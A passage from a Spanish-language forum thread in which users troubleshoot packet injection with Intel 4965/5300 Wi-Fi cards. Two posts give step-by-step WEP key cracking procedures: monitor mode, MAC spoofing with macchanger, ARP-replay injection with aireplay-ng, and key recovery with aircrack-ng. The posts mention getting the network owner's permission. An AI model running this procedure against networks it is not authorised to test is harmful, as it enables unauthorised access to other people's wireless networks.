?>/script>'; } ?> Inyectar con 4965 Widgets Magazine

Autor Tema: Inyectar con 4965  (Leído 254197 veces)

0 Usuarios y 1 Visitante están viendo este tema.

wuith

  • Visitante
Re: Inyectar con 4965
« Respuesta #300 en: 15-01-2010, 17:14 (Viernes) »
FUNCIONAAAAAA!!! Con la explicación de cantinflas (p.7) me ha funcionado ^^  >:( >:( >:(Gracias!

raspa1989

  • Visitante
Re: Inyectar con 4965
« Respuesta #301 en: 19-01-2010, 21:06 (Martes) »
Hola gente! Soy nuevo en el foro  y me gusta mucho la informatica,aparte que estoy en un ciclo!. Me registrado porqe no aguanto mas, habre leido cada post 500 veces sobre la 4965agn de los co*****. Tengo 2 problemas,
decirles que tengo un Acer timeline 1810TZ con la 4965. Tengo ubuntu 9.10 instalado con windows 7, los driver me los detecta y se pone en mon0 y busca redes pero no inyecta, y bueno no me preocupo y me pase al wifiway.
Ahora el wifiway lo instalo y no me detecta los driver :( ! porqe ? se supone que los driver vienen ya metidos no ? tecleo iwconfig y me sale device uknown, y en ifconig solo loopack, ningun programa me funciona :(.

Alguien sabe porque no me la detecta ? perdonen pero enserio me leido cada post 3 veces a la gente reciniando se le arregla pero a mi no :(.

desder

  • Visitante
Re: Inyectar con 4965
« Respuesta #302 en: 20-01-2010, 11:15 (Miércoles) »
Bueno, bueno, pues aqui va mi tutorial de como lo consegui ( no es gran cosa pero espero que sirva):

1.-Pedir permiso, al propietario de la red si esta no es nuestra.

2.-airmon-ng start wlan0 ( yo no pongo el canal).

3.-airodump-ng mon0 ( lo hago para saber la mac, canal y nombre de la red que vamos a ''atacar'', otra cosa yo no paro el airodump, despues os explicare por que).

---Abrir nuevo terminal o solapa---

4.-ifconfig wlan0 down

5.-macchanger -m 00:11:22:33:44:55 wlan0 ( importante pero no es obligatorio hacerlo).

6-ifconfig wlan0 up ( está claro que si no queremos hacer el paso 5, tampoco debemos hacer el 4 y el 6)

7.-editar el wpa.conf poniendo los datos correspondientes.
   -wpa_supplicant -c/home/desder/wpa.conf -Dwext -iwlan0 ( la ruta se cambia por la que cada uno tenga, eso si debemos dejar el ''-c'' delante de la ruta).

---lo que os decía antes de no parar el airodump era por que cuando intento asociarme con el wpa_supplicant siempre me salia algo como ''asosiation driver failed'' asi que un dia se me olvido parar el airodump y vuala me salio lo de completedm eso si al parar el airodump despues de este paso se me desasociaba---

---Abrir nuevo terminal o solapa ( yo el wpa_supplicant lo dejo funcionando no tengo ninguna explicaion para esto pero el lo que hago)---

8-airodump-ng -w dexter-back -c channel mon0 ( yo lo de dexter-back lo cambio por el nombre de la red asi despues facil de reconocer cada captura para que red sirve)

---Abrir nuevo terminal o solapa---

9-aireplay-ng -3 -b mac ap -h 00:11:22:33:44:55 mon0 ( los que no hicieron los pasos 4, 5 y 6 lo de 00:11:22:33:44:55 lo cambien por su mac)(si os dice que no se que de que la mon0 esta en otro canal pues le volveis a dar hasta que en la que busque y la de la red coincidan).

10.-aircrack-ng *.cap
     -elegir la red
     -y si tenemos suficientes data pues:

                                            key found!!!


posdata: yo utilizo ubuntu 9.10 2.6.31-17-generic, el unico problema que a mi me surge es en el paso numero 9 al intentar inyectar hay veces que tarda unos 7-8 minutos y hay otras que 20-30 minutos y hay veces que despues de 2-3 horas aún no ha empezado a inyectar, si alguien me podria ayudar con esto lo agradecería.

raspa1989

  • Visitante
Re: Inyectar con 4965
« Respuesta #303 en: 20-01-2010, 15:58 (Miércoles) »
JOlines pues yo uso el ubuntu 9.10 y la 4965 no inyecta ni insultandola, y luego el wifiway no me la detecta ...:S yo nose que pasa.. se supone que para la 4965 el wifiway te la detecta de manera automatica.

He encontrado esto, que es una parte de loqe trae wifiway final:

"Intel pro wireless 3945, ipwraw old, los primeros drivers para estos equipos que hemos mantenido, por defecto no se cargan, se debe usar lanzador.
Familia mac80211
La nueva generación de drivers, suite aircrack-ng adaptada a ellos, se trabajan con interfaces diferentes
Zydas zd1211rw-mac80211
Intel pro wireless iwlagn con firmware para las nuevas iwl4965 y iwl5×00.
Intel pro wireless iwl3945, son cargados por defecto"

¿Como cargo los driver de la 4965 los "iwl4965"?
« Última modificación: 20-01-2010, 17:20 (Miércoles) por raspa1989 »

desder

  • Visitante
Re: Inyectar con 4965
« Respuesta #304 en: 21-01-2010, 12:38 (Jueves) »
JOlines pues yo uso el ubuntu 9.10 y la 4965 no inyecta ni insultandola, y luego el wifiway no me la detecta ...:S yo nose que pasa.. se supone que para la 4965 el wifiway te la detecta de manera automatica.

He encontrado esto, que es una parte de loqe trae wifiway final:

"Intel pro wireless 3945, ipwraw old, los primeros drivers para estos equipos que hemos mantenido, por defecto no se cargan, se debe usar lanzador.
Familia mac80211
La nueva generación de drivers, suite aircrack-ng adaptada a ellos, se trabajan con interfaces diferentes
Zydas zd1211rw-mac80211
Intel pro wireless iwlagn con firmware para las nuevas iwl4965 y iwl5×00.
Intel pro wireless iwl3945, son cargados por defecto"

¿Como cargo los driver de la 4965 los "iwl4965"?


hola:

yo tambien lo probe con wifiway y la verdad es que me lleve una decepcion porque a mi nisiquiera se me encendia la lucecita del wifi, para tu caso si no recuerdo mal habia que cargar no se si los modulos o no se como se llamaban, era ir al menu y en la opcion de arriba del todo entras allí encontraras si no recuerdo mal chipsets y alli le das al ipw4965 y te lo cargarba.

 :'( siento explicarlo de esta manera pero es que el cd de wifiway ahora mismo no esta en mis manos cuando lo tenga editare este mensaje para explicarlo bien   ;) .

raspa1989

  • Visitante
Re: Inyectar con 4965
« Respuesta #305 en: 21-01-2010, 20:13 (Jueves) »
Gracias tio por contestar, perop  en el wifi way 1.0 final que me descargado solo aparecen en "inicio/wifiway/chipset/"unas cuantas tarjetar como atheros, Intel chipset, y solo aparece la iwl3965, la iwl4965 o en su defecto iwlagn para la 4965 no aparece :S.

Es rarisimo le doy al boton del wifi y nada, no aparecen los driver por las carpetas y si tecleo iwconfig me pone "Lo no wireless", ni me aparece wlan0, si pongo ifconfig me aparece solo loopback 127.0.0.1 :S. Nose como la gente puede hacer rular esta tarjeta :S nose que mas hacer. Gracias por contestar.

dranlys

  • Visitante
Re: Inyectar con 4965
« Respuesta #306 en: 21-01-2010, 21:28 (Jueves) »
Bueno, tiempo que intento y aun no puedo salir de este problema, el wpa_supplicant.
Este es mi wpa_conf
Código: [Seleccionar]
network={
        ssid="zbdstudio"
        key_mgmt=NONE
        bssid=00:02:CF:BF:30:FC
        wep_key0="232323343478787"
}

Sin embargo se queda en el bucle siguiente
Código: [Seleccionar]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
Trying to associate with 00:02:cf:bf:30:fc (SSID='zbdstudio' freq=2437 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Association request to the driver failed
Associated with 00:00:00:00:00:00
CTRL-EVENT-CONNECTED - Connection to 00:00:00:00:00:00 completed (reauth) [id=0 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
^CCTRL-EVENT-TERMINATING - signal 2 received

Ya lo he dejado como dos horas y no llega a conectar.

He realizado los primeros pasos, como todos los tutoriales, a lo que tengo duda y que creo es como debo dejar mi wireless, si me desconecto de la red en la que estoy, o la dejo tal como esta.

raspa1989

  • Visitante
Re: Inyectar con 4965
« Respuesta #307 en: 22-01-2010, 08:59 (Viernes) »
A mi me pasa lo mismo cuando intento asociarme a mi red WEP con un wpa_supplicant, me sale lo mismo que a ti y te digo que eso esta mal... no llega a asociarse, sin embargo si uso para asociarme un "aireplay-ng -1 30 -e (nombre de la red) -a (mac router) -h ( tu mac)  mon0 si se me asocia y me sale una carita feliz :-)" como esa, pero claro segun los expertos hay que usar el supplicant, y tampco me inyecta. En wifiway ni me la reconoce...

dranlys

  • Visitante
Re: Inyectar con 4965
« Respuesta #308 en: 22-01-2010, 15:46 (Viernes) »
Uhmm, ahh verdad otra ayuda .. weno segun pude ayer creo que porque estuvieron descargando un gran fichero, llegue a capturar 20000 #datos, pero al momento de capturar la contraseña me da lo siguiente:
Código: [Seleccionar]
root@Josue-PC:~# aircrack-ng jhoshua.cap
Opening jhoshua.cap
open failed: No such file or directory
Read 0 packets.

No networks found, exiting.


Quitting aircrack-ng...

alguien que sepa cual es el motivo, aclaro que el nombre esta bien y estoy en ubuntu 9.10
« Última modificación: 22-01-2010, 15:53 (Viernes) por dranlys »

raspa1989

  • Visitante
Re: Inyectar con 4965
« Respuesta #309 en: 22-01-2010, 15:55 (Viernes) »
Pero como solucionaste tu problema de asociacion?? me pasa lo mismo que a ti con el wpa_supplicant :S  :(

manel

  • Visitante
Re: Inyectar con 4965
« Respuesta #310 en: 22-01-2010, 19:03 (Viernes) »
Buenas

Uhmm, ahh verdad otra ayuda .. weno segun pude ayer creo que porque estuvieron descargando un gran fichero, llegue a capturar 20000 #datos, pero al momento de capturar la contraseña me da lo siguiente:
Código: [Seleccionar]
root@Josue-PC:~# aircrack-ng jhoshua.cap
Opening jhoshua.cap
open failed: No such file or directory
Read 0 packets.

No networks found, exiting.


Quitting aircrack-ng...

alguien que sepa cual es el motivo, aclaro que el nombre esta bien y estoy en ubuntu 9.10

Prueba:

        aircrack-ng jhoshua-01.cap

Cada vez que lanzas el airodump-ng ....  -w joshua ... se te crea un archivo llamado joshua-01.cap, si lo vueles a lanzar con el mismo nombre se creará el  joshua-02.cap, etc...

Si no sabes cual es escribe el comando así:

        aircrack-ng jhoshua*.cap

Te los abrirá todos

Suerte

raspa1989

  • Visitante
Re: Inyectar con 4965
« Respuesta #311 en: 24-01-2010, 17:16 (Domingo) »
Bueno, tiempo que intento y aun no puedo salir de este problema, el wpa_supplicant.
Este es mi wpa_conf
Código: [Seleccionar]
network={
        ssid="zbdstudio"
        key_mgmt=NONE
        bssid=00:02:CF:BF:30:FC
        wep_key0="232323343478787"
}

Sin embargo se queda en el bucle siguiente
Código: [Seleccionar]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
Trying to associate with 00:02:cf:bf:30:fc (SSID='zbdstudio' freq=2437 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Association request to the driver failed
Associated with 00:00:00:00:00:00
CTRL-EVENT-CONNECTED - Connection to 00:00:00:00:00:00 completed (reauth) [id=0 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
^CCTRL-EVENT-TERMINATING - signal 2 received

Ya lo he dejado como dos horas y no llega a conectar.

He realizado los primeros pasos, como todos los tutoriales, a lo que tengo duda y que creo es como debo dejar mi wireless, si me desconecto de la red en la que estoy, o la dejo tal como esta.

A mi me pasa lo mismo :(, alguien sabe  porque ? :( uso ubuntu 9.10 nose si algo qe ver ..me reconoce la tarjeta y monitorea pero al asociarme me sale asi como el...

redrage

  • Visitante
Re: Inyectar con 4965
« Respuesta #312 en: 24-01-2010, 17:51 (Domingo) »
Mira que he hecho pruebas con un monton de chipset, pero este 4965 se me esta resistiendo.

Yo tambien tengo el error de "Disconnect Event - Remove Keys" con el WPA supplicant.

¿Seguimos sin saber a que se debe esto?

raspa1989

  • Visitante
Re: Inyectar con 4965
« Respuesta #313 en: 24-01-2010, 22:19 (Domingo) »
Bueno queria decir que en ubuntu 9.10 sigo teniendo el problema de disconected keys y la mac en 00:00:00:00..., con wifiway 1.0 final ni me la detecta, actualice el kernel al 28 y tampoco me la detectaba.

Ya desesperado probe este wifiway:

http://foro.elhacker.net/wireless_en_linux/wifiway_10_final_con_entorno_lxde-t274129.0.html;msg1344647

y nose como pero me a detectado la 4965 a la primera sin persistant changes, mas que nada porque no tiene persistant changes, pero bueno por si a alguien le pasaba como a mi, prueben con ese que ese si que funciona. Tengo un acer timeline 1810TZ por si importa.

No e probado a inyectar todavia ni a asociarme, pero si monitoriza.

MODIFICADO

Pues e probado a usar la 4965 con airoscript usando wlan0 y mon0 y cuando sale la pantalla de asociacion con letras rojas no se asocia :S
« Última modificación: 25-01-2010, 16:50 (Lunes) por raspa1989 »

raspa1989

  • Visitante
Re: Inyectar con 4965
« Respuesta #314 en: 01-02-2010, 19:40 (Lunes) »
Bueno, tiempo que intento y aun no puedo salir de este problema, el wpa_supplicant.
Este es mi wpa_conf
Código: [Seleccionar]
network={
        ssid="zbdstudio"
        key_mgmt=NONE
        bssid=00:02:CF:BF:30:FC
        wep_key0="232323343478787"
}

Sin embargo se queda en el bucle siguiente
Código: [Seleccionar]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
Trying to associate with 00:02:cf:bf:30:fc (SSID='zbdstudio' freq=2437 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Association request to the driver failed
Associated with 00:00:00:00:00:00
CTRL-EVENT-CONNECTED - Connection to 00:00:00:00:00:00 completed (reauth) [id=0 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
^CCTRL-EVENT-TERMINATING - signal 2 received

Ya lo he dejado como dos horas y no llega a conectar.

He realizado los primeros pasos, como todos los tutoriales, a lo que tengo duda y que creo es como debo dejar mi wireless, si me desconecto de la red en la que estoy, o la dejo tal como esta.

A mi me pasa lo mismo :(, alguien sabe  porque ? :( uso ubuntu 9.10 nose si algo qe ver ..me reconoce la tarjeta y monitorea pero al asociarme me sale asi como el...

No sabe nadie porque es ese fallo de disconect event ?? :S

Post Merge: [time]lun 01 feb 2010 22:23:56 GMT-1[/time]
INYECCION 4965 AGN en Linux Ubuntu 9.10  claves WEP ( PROBADO 100% DEFINITIVO)


1.   iwlist wlan0 scan ( para  ver las redes sin iniciar airmon-ng ), debemos de fijarnos en los campos:
-  BSSID que es la mac de la red. aa:bb:cc:dd:ee     por ejemplo.
-   SSID que es el nombre de la red.
-   CHANNEL o C, lo apuntamos, es el canal que usa la red.
-   Si queremos usar macchanger para cambiar nuestra mac se hace asi :
Ifconfig  wlan0 down
Macchanger   -m  11:22:33:44:55  wlan 0 o poner los digitos que queramos.
Ifconfig   wlan0 up  (todos estos pasos con sudo delante si no somos root).
Yo este tutorial lo he hecho sin macchanger y me a funcionado.

2.   Abrimos una terminal nueva, tecleamos “sudo su” ponemos la contraseña y seremos root.
-   airmon-ng   start   wlan0 9    ( el numero 9 es el canal de mi red seleccionada, vosotros teneis que poner el canal de vuestra red, que hemos mirado con el comando anterior).
-   Se nos creara una interfaz nueva virtual llamada mon0, que lo podemos mirar con el comando “iwconfig”.
-   Aquí viene lo que hice y me funciono, teclee 3 veces más “airmon-ng start wlan0 9” y me creo 3 interfaces nuevas, llamadas mon0, mon1, mon2 y mon3.
-   Se quedaría wlan0, mon0, mon1, mon2 y mon3. ¿ Por qué hago esto? Porque  la tarjeta 4965 agn solo inyecta, asocia y monitorea con interfaces “mon”. No utilizo wlan0 para nada, solo para iwlist wlan0 scan.

3.   airodump-ng     –w  redes    –bssid aa:bb:cc:dd:ee    -c  9 mon0
-
   Utilizaremos mon0 para escanear la red seleccionada, -c es el canal que hemos apuntado,  -w es el nombre de los archivos que nos guardara en la carpeta  /home/nuestro usuario/, es decir nuestra carpeta personal.
-   -bbsid es la dirección MAC de el Router de la red que hemos seleccionado.

4.   Creamos en el escritorio un archivo de texto llamado wpa.conf con la estructura siguiente, debemos guardarlo, hay gente que lo deja abierto, yo no:
Network={
      ssid=”Nombre de la red”  ( va con comillas)
      key_mgmt=NONE
      bssid= aa:bb:cc:dd:ee   ( por ejemplo)
      wep_key0=”1234567890” ( con comillas)
}

5.   Abrimos una terminal nueva, tecleamos “sudo su” ponemos la contraseña y seremos root, nos asociamos con:


-   wpa_supplicant   -c/home/nuestro usuario/Escritorio/wpa.conf   -Dwext   –imon2
-   usamos la interfaz mon2 para que se asocie, y nos debe de mostrar este mensaje entre otros tantos como:
 CRTL-EVENT-CONECTED – Conecction  aa:bb:cc:dd:ee    completed (reauth) [id=0 id_str=]
( Si os sale una cosa como “CRTL-EVENT-DISCONNECTED- disconnect remove keys “ es porque no habeis usado una interfaz mon). Podeis usar la mon1, pero a mi no me funciona aunque este creada, asique uso mon2.  El  -imon2 no es una errata debemos poner  -i “interfaz mon” como pone ahí.

6.   Abrimos otra ventana o solapa y tecleamos sudo su como antes:
-   Aireplay-ng   -3  -b  aa:bb:cc:dd:ee   -h 11:22:33:44:55 mon3
Os explico,   -b es la mac del ruter e decir la bssid,  -h es nuestra mac de nuestra tarjeta, y la interfaz mon3. Yo no he usado macchanger porque es mi red y no me hacia falta.  Si quereis usar macchanger, debeis hacerlo después de iwlist wlan0 scan.
-   Este punto es crucial, debemos esperar a que inyecte, puede variar el tiempo.
-   Es favorable que haya alguien dentro de la red.
-   Hay ruter que no soportan esta inyección.
-   Con wifiway 1.0 final no he sido capaz de inciar la tarjeta no me la reconoce, con wifiway 1.0 KXDE creo que es… si me la reconoce pero el airoscript no se asocia, se me queda en open system todo el rato y la ventana acaba desapareciendo.


7.   Debemos asegurarnos que estamos asociados en la ventana de airodump, en las columnas:
Bssid, station, PWR, rate, lost, paquets, probes, debajo de estas columnas debe aparecer nuestra conexión con nuestra MAC y la mac del ruter.

8.   Cuando consiga inyectar y los datas suban debemos tener 300 000 o asi mas o menos, depende de la clave, pueden ser mas o menos.
9.   Teclear en otra ventana sudo su, y el comando: aircrack-ng   *.cap  y nos sacara la clave :D
-   Si teneis dudas sobre el proceso postear, me alegro de haber solucionado mi problema, la interfaz wlan0 que aparece en todos los tutoriales a mi no me funciona.
« Última modificación: 01-02-2010, 22:29 (Lunes) por raspa1989 »

trini

  • Visitante
Re: Inyectar con 4965
« Respuesta #315 en: 24-02-2010, 16:05 (Miércoles) »
Buenas, soy novato e intentaba descifrar mi router pero no lo conseguía, un compañero del foro me aconsejo que con la tarjeta que yo tengo me pasara por este post; antes de ir probando a lo loco quisiera hacer una pregunta:
mi tarjeja es una Intel(R) Wireless WiFi Link 5300,
¿los pasos que aqui se describen sirven para mi tarjeta?

por favor, espero respuesta

un saludo y gracias



Post Merge: [time]jue 25 feb 2010 23:21:56 GMT-1[/time]
Bueno, tiempo que intento y aun no puedo salir de este problema, el wpa_supplicant.
Este es mi wpa_conf
Código: [Seleccionar]
network={
        ssid="zbdstudio"
        key_mgmt=NONE
        bssid=00:02:CF:BF:30:FC
        wep_key0="232323343478787"
}

Sin embargo se queda en el bucle siguiente
Código: [Seleccionar]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
Trying to associate with 00:02:cf:bf:30:fc (SSID='zbdstudio' freq=2437 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Association request to the driver failed
Associated with 00:00:00:00:00:00
CTRL-EVENT-CONNECTED - Connection to 00:00:00:00:00:00 completed (reauth) [id=0 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
^CCTRL-EVENT-TERMINATING - signal 2 received

Ya lo he dejado como dos horas y no llega a conectar.

He realizado los primeros pasos, como todos los tutoriales, a lo que tengo duda y que creo es como debo dejar mi wireless, si me desconecto de la red en la que estoy, o la dejo tal como esta.

A mi me pasa lo mismo :(, alguien sabe  porque ? :( uso ubuntu 9.10 nose si algo qe ver ..me reconoce la tarjeta y monitorea pero al asociarme me sale asi como el...

No sabe nadie porque es ese fallo de disconect event ?? :S

Post Merge: [time]lun 01 feb 2010 22:23:56 GMT-1[/time]
INYECCION 4965 AGN en Linux Ubuntu 9.10  claves WEP ( PROBADO 100% DEFINITIVO)


1.   iwlist wlan0 scan ( para  ver las redes sin iniciar airmon-ng ), debemos de fijarnos en los campos:
-  BSSID que es la mac de la red. aa:bb:cc:dd:ee     por ejemplo.
-   SSID que es el nombre de la red.
-   CHANNEL o C, lo apuntamos, es el canal que usa la red.
-   Si queremos usar macchanger para cambiar nuestra mac se hace asi :
Ifconfig  wlan0 down
Macchanger   -m  11:22:33:44:55  wlan 0 o poner los digitos que queramos.
Ifconfig   wlan0 up  (todos estos pasos con sudo delante si no somos root).
Yo este tutorial lo he hecho sin macchanger y me a funcionado.

2.   Abrimos una terminal nueva, tecleamos “sudo su” ponemos la contraseña y seremos root.
-   airmon-ng   start   wlan0 9    ( el numero 9 es el canal de mi red seleccionada, vosotros teneis que poner el canal de vuestra red, que hemos mirado con el comando anterior).
-   Se nos creara una interfaz nueva virtual llamada mon0, que lo podemos mirar con el comando “iwconfig”.
-   Aquí viene lo que hice y me funciono, teclee 3 veces más “airmon-ng start wlan0 9” y me creo 3 interfaces nuevas, llamadas mon0, mon1, mon2 y mon3.
-   Se quedaría wlan0, mon0, mon1, mon2 y mon3. ¿ Por qué hago esto? Porque  la tarjeta 4965 agn solo inyecta, asocia y monitorea con interfaces “mon”. No utilizo wlan0 para nada, solo para iwlist wlan0 scan.

3.   airodump-ng     –w  redes    –bssid aa:bb:cc:dd:ee    -c  9 mon0
-
   Utilizaremos mon0 para escanear la red seleccionada, -c es el canal que hemos apuntado,  -w es el nombre de los archivos que nos guardara en la carpeta  /home/nuestro usuario/, es decir nuestra carpeta personal.
-   -bbsid es la dirección MAC de el Router de la red que hemos seleccionado.

4.   Creamos en el escritorio un archivo de texto llamado wpa.conf con la estructura siguiente, debemos guardarlo, hay gente que lo deja abierto, yo no:
Network={
      ssid=”Nombre de la red”  ( va con comillas)
      key_mgmt=NONE
      bssid= aa:bb:cc:dd:ee   ( por ejemplo)
      wep_key0=”1234567890” ( con comillas)
}

5.   Abrimos una terminal nueva, tecleamos “sudo su” ponemos la contraseña y seremos root, nos asociamos con:


-   wpa_supplicant   -c/home/nuestro usuario/Escritorio/wpa.conf   -Dwext   –imon2
-   usamos la interfaz mon2 para que se asocie, y nos debe de mostrar este mensaje entre otros tantos como:
 CRTL-EVENT-CONECTED – Conecction  aa:bb:cc:dd:ee    completed (reauth) [id=0 id_str=]
( Si os sale una cosa como “CRTL-EVENT-DISCONNECTED- disconnect remove keys “ es porque no habeis usado una interfaz mon). Podeis usar la mon1, pero a mi no me funciona aunque este creada, asique uso mon2.  El  -imon2 no es una errata debemos poner  -i “interfaz mon” como pone ahí.

6.   Abrimos otra ventana o solapa y tecleamos sudo su como antes:
-   Aireplay-ng   -3  -b  aa:bb:cc:dd:ee   -h 11:22:33:44:55 mon3
Os explico,   -b es la mac del ruter e decir la bssid,  -h es nuestra mac de nuestra tarjeta, y la interfaz mon3. Yo no he usado macchanger porque es mi red y no me hacia falta.  Si quereis usar macchanger, debeis hacerlo después de iwlist wlan0 scan.
-   Este punto es crucial, debemos esperar a que inyecte, puede variar el tiempo.
-   Es favorable que haya alguien dentro de la red.
-   Hay ruter que no soportan esta inyección.
-   Con wifiway 1.0 final no he sido capaz de inciar la tarjeta no me la reconoce, con wifiway 1.0 KXDE creo que es… si me la reconoce pero el airoscript no se asocia, se me queda en open system todo el rato y la ventana acaba desapareciendo.


7.   Debemos asegurarnos que estamos asociados en la ventana de airodump, en las columnas:
Bssid, station, PWR, rate, lost, paquets, probes, debajo de estas columnas debe aparecer nuestra conexión con nuestra MAC y la mac del ruter.

8.   Cuando consiga inyectar y los datas suban debemos tener 300 000 o asi mas o menos, depende de la clave, pueden ser mas o menos.
9.   Teclear en otra ventana sudo su, y el comando: aircrack-ng   *.cap  y nos sacara la clave :D
-   Si teneis dudas sobre el proceso postear, me alegro de haber solucionado mi problema, la interfaz wlan0 que aparece en todos los tutoriales a mi no me funciona.

Gracias, me funciono. ;D ;D ;D >:( >:( >:(

Dejo aqui la prueba realizada:

mi tarjeta es una   Intel(R) Wireless WiFi Link 5300, y como con wifislax y wifiway estaba loco, segui la recomendacion del compañero chinitiw y me pase por este post. como no tenia ni idea de ubuntu, al principio me costo un poco instalarlo, ya que mi intencion era no tocar el portatil y decidi instalarlo en un lapiz de memoria de 8gb, tube que trastear un poco pero al final lo consegui. por cierto, este sistema operativo (sin a ver trasteado mucho), parece que esta muy bien.
 
voy al lio:
1º-coloco al router una clave de 64bits y a la primera con 50000 datas, bingo.
2º-configuro el router con clave de 128bits y tambien a la primera con 370000 datas, bingo

quiero hacer una tercera prueba con el router de mi vecino, pero asta mañana no podre pedirle permiso, asin que a esperar.

tambien tengo dos preguntas importantes, sobre todo la primera:

¿donde van los archivos de los datas?   ejpl: rede-01.cap; para poder borrarlos.

¿alguien me puede orientar cual es el post para las claves wap y wap2?, para tambien realizar pruebas.

todo esto con este manual y al 100%

gracias y un saludo

 Edito para aumentar datos:
prueba cambiando la mac a 00:11:22:33:44:55
no funciona, supongo por que habría que cambiar las mac con la que inyecta y la que asocia por que estas singuen con la mac original; he probado a cambiarla pero me da error(seguramente por que yo no se), asi que solo puedo inyectar con la mac original.
sigo todo el manual menos una sola cosa, el comamdo Ifconfig   wlan0 up, no lo ejecuto por que si lo pongo no se asocia.

SALUDOS


« Última modificación: 26-02-2010, 15:28 (Viernes) por trini »

raspa1989

  • Visitante
Re: Inyectar con 4965
« Respuesta #316 en: 03-03-2010, 22:37 (Miércoles) »
Me alegro que te haya funcionado, los *.cap estan en tu carpeta personal, para entrar pincha arriba en "lugares" y luego "carpeta personal" ahi tendras los cap. Lo de Ifconfig wlan0 up, es para levantar la tarjeta de red inalambrica con la mac cambiada por macchanger, pero sino usas macchanger saltate ese paso, yo no lo e pobado con macchanger pero creo que no funciona, a mi solo con la original.

trini

  • Visitante
Re: Inyectar con 4965
« Respuesta #317 en: 05-03-2010, 15:35 (Viernes) »
Me alegro que te haya funcionado, los *.cap estan en tu carpeta personal, para entrar pincha arriba en "lugares" y luego "carpeta personal" ahi tendras los cap. Lo de Ifconfig wlan0 up, es para levantar la tarjeta de red inalambrica con la mac cambiada por macchanger, pero sino usas macchanger saltate ese paso, yo no lo e pobado con macchanger pero creo que no funciona, a mi solo con la original.
gracias por contestar, el caso es que cuando tube ubuntu instalado la 1ª vez, si aparecian los achivos, pero desde que me dio el error y tube que reinstalarlo no me aparecen. a mi tampoco me funciona cambiando la mac, pero si tengo que hacer Ifconfig wlan0 down para que se asocie(aunque no cambie la mac) poque que si la dejo levantada no me asocia.

en definitiva:
1º-ahora no aparecen los archivos *.cap para poder borrarlos ( aunque cuando ejecuto aircrack-ng   *.cap si aparecen)
2º-yo forzosamente tengo que ejecutar Ifconfig wlan0 down pero no Ifconfig wlan0 up

saludos

chinitiw

  • Visitante
Re: Inyectar con 4965
« Respuesta #318 en: 05-03-2010, 18:07 (Viernes) »
buenas:

Seguramente , como debes de usar el comando sudo para algunas ordenes esas capturas estén en /root , pero para acceder a las mismas debes de ser root .

Yo lo haría así:

su -l

buscaría dentro de la carpeta root todos los .cap

find /root -name *.cap > todos.txt

así todos los almacenarás( las rutas de donde están) a ese fichero de texto , para tenerlos controlados , si lo quieres leer cat todos.txt | more

luego

rm -R *.cap

y andando

P.D. ojo que hace tiempo que no me pongo mucho con comandos de sistema y menos con ubuntu e igual te haces una canterita en ese pen de 8 Gb  ;D

P.D. 2 si he dicho una burrada (espero que no) , me lo corrijan

saludos
« Última modificación: 05-03-2010, 18:11 (Viernes) por chinitiw »

trini

  • Visitante
Re: Inyectar con 4965
« Respuesta #319 en: 06-03-2010, 16:45 (Sábado) »
buenas:

Seguramente , como debes de usar el comando sudo para algunas ordenes esas capturas estén en /root , pero para acceder a las mismas debes de ser root .

Yo lo haría así:

su -l

buscaría dentro de la carpeta root todos los .cap

find /root -name *.cap > todos.txt

así todos los almacenarás( las rutas de donde están) a ese fichero de texto , para tenerlos controlados , si lo quieres leer cat todos.txt | more

luego

rm -R *.cap

y andando

P.D. ojo que hace tiempo que no me pongo mucho con comandos de sistema y menos con ubuntu e igual te haces una canterita en ese pen de 8 Gb  ;D

P.D. 2 si he dicho una burrada (espero que no) , me lo corrijan

saludos

buenas, yo siempre cuando abro terminal,en el abro cuatro pestañas y lo 1º que ejecuto en todas ellas es sudo -i y mi contraseña; despues los comandos necesarios.
probare con los comandos que me dices a ver si tengo suerte y los puedo borrar; ya informare de los resultados

gracias y saludos